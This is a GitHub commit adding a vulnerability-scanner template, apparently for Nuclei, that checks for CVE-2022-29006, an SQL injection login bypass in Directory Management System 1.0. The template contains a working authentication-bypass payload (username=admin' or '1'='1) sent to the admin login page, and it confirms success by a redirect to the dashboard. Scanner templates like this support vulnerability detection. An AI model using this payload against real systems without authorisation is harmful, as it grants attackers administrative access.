CREATE CVE-2022-29006

CREATE CVE-2022-29006
patch-1
TenBird-1 2022-09-01 21:34:27 +09:00 committed by GitHub
parent a79f12ca53
commit 8bed168e04
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 35 additions and 0 deletions

View File

@ -0,0 +1,35 @@
id: CVE-2022-29006
info:
name: Directory Management System 1.0 - SQL Injection Authentication Bypass
author: TenBird
severity: Critical
description: Multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel of Directory Management System v1.0 allows attackers to bypass authentication.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-29006
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29006
cwe-id: CWE-89
tags: cve,cve2022,SQL Injection
requests:
- raw:
- |
POST /admin/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=admin' or '1'='1&password=1&login=login
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 302
- type: word
part: header
words:
- 'Location: dashboard.php'